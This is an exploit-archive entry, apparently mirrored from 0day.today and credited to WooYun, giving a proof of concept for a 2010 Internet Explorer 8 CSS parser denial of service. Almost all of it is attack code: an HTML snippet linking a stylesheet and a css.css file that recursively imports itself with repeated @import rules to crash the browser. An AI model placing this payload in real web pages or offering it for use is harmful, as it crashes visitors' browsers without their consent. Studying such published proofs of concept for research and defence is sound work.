id: 15086
date: 12/09/2010
title: Internet Explorer 8 CSS Parser Denial of Service
author: WooYun
cves: 

================================================
Internet Explorer 8 CSS Parser Denial of Service
================================================

<code>
<div style="position: absolute; top: -999px;left: -999px;">
<link href="css.css" rel="stylesheet" type="text/css" />
</code>
 
<code of css.css>
*{
 color:red;
}
@import url("css.css");
@import url("css.css");
@import url("css.css");
@import url("css.css");
</code>
 
http://www.wooyun.org/bugs/wooyun-2010-0885
 
WooYun is a connection platform for vendors and security researchers



#  0day.today [2023-03-23]  #